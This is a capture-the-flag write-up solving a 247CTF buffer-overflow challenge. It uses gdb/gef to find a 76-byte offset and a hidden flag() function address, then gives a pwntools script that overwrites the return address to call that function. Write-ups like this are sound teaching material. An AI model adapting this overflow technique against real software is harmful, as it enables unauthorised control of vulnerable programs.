
Let's run it and see what we get

Just takes some input.
Lets use **gdb** (with **gef**) to analyze the binary.
First, find the function
`info functions`

So the function we want is at `0x08048576`
Next, find the offset
1. Create a pattern
`pattern create 100`
2. Send that to the program by first running it with **r**
Nice! We get a **segfault**

**gdb** is telling us that the segfault is at `0x61616174`. Let's use that as our pattern search parameter to find the offset
`pattern search 0x61616174`

There's our offset! **76**
We can test this by using **pi** in **gef** and sending the output into the program.
`pi print('A'*76 + 'B'*4)`

If all goes well, it should fill the buffer with **41** and overwrite the instruction pointer with `0x424242` *(A = 41, B = 42)*

Cool, so we control the instruction pointer now.
Now that we know the **offset** and the **function address**, we can write an exploit.
Here's my code:
```Python
#importing the pwntools library
from pwn import *
#creating the process
io = process('./hidden_flag_function')
#creating the connection to the server
#io = remote('1e9f746024b2e701.247ctf.com', 50254)
#setting the padding and function location variables
padding = b'A' * 76
funcloc = 0x08048576
#attaching the process to GDB for debugging
gdb.attach(io)
#recieving one line
io.recvline()
#sending the payload
io.sendline(padding + p32(funcloc))
#recieving 3 lines
print(io.recvline())
print(io.recvline())
print(io.recvline())
```

Looks good! Looks like we called the `flag()` function which then called `fgets()` and it broke. Let's fire it at the service by uncommenting the `io = remote()` line, and commenting out the `gdb.attach(io)` and `io = process()` lines

---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #buffer_overflow #exploit_development #pwn #scripting #gdb #gef
Related: